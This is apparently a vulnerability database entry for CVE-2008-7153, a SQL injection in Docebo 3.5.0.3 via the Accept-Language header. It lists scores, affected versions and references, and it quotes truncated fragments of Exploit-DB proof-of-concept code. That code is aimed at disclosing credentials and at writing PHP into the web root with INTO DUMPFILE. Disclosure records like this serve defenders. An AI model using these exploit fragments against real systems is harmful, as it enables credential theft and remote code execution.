CVE-2008-7153
Published 2009-09-02
CVE-2008-7153: SQL injection vulnerability in the autoDetectRegion function in doceboCore/lib/lib.regset.php in Docebo 3.5.0.3 and earlier allows remote attackers to execute…
Priority: P347, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.39% (81.8th percentile)
SQL injection vulnerability in the autoDetectRegion function in doceboCore/lib/lib.regset.php in Docebo 3.5.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Accept-Language HTTP header. NOTE: this can be leveraged to execute arbitrary PHP code using the INTO DUMPFILE command.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| docebo | docebo | <= 3.5.0.3 | — |
| docebo | docebo | — | — |
| docebo | docebo | — | — |
| docebo | docebo | — | — |
| docebo | docebo | — | — |
No detection rules found.
Exploit-DB
Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection
exploitdb·2008-01-11
CVE-2008-7153 Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection
---
= 4.1
PHP 5.X (needed by Docebo) regardless of php.ini settings
no benchmark()
quickly coded to perform credentials disclosure
');
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$
Exploit-DB
Docebo 3.5.0.3 - 'lib.regset.php' Command Execution
exploitdb·2008-01-09
CVE-2008-7154 Docebo 3.5.0.3 - 'lib.regset.php' Command Execution
---
_getListTable()." WHERE browsercode LIKE '%".$browser_language."%'"; _executeQuery($qtxt);
801.
802. if (($q) && (mysql_num_rows($q) > 0)) {
803. $row=mysql_fetch_array($q);
804. $res=$row["region_id"];
805. }
An attacker could inject SQL code through the HTTP Accept-Language header (in the query at line 799), but the explode() function at line 790 will split the injected code by comma (","), so even a blind SQL injection with the BENCHMARK() method isn't possible...
This PoC will try to inject some PHP code into the Docebo web directory via an INTO DUMPFILE statement; this requires the FILE privilege!
[-] Path disclosure at:
/doceboCore/class/class.conf_fw.php
/doceboCore/class.module/class.event_manager.php
/doceboCore/lib/lib.domxml5.php
/doceboCo
No writeups or analysis indexed.
http://osvdb.org/40138
http://secunia.com/advisories/28378
http://www.docebo.org/doceboCms/bugtracker/18_124/bugdetails/appid_24-bugid_198/bugtracker.html
http://www.securityfocus.com/bid/27211
https://exchange.xforce.ibmcloud.com/vulnerabilities/39589
https://www.exploit-db.com/exploits/4879
https://www.exploit-db.com/exploits/4891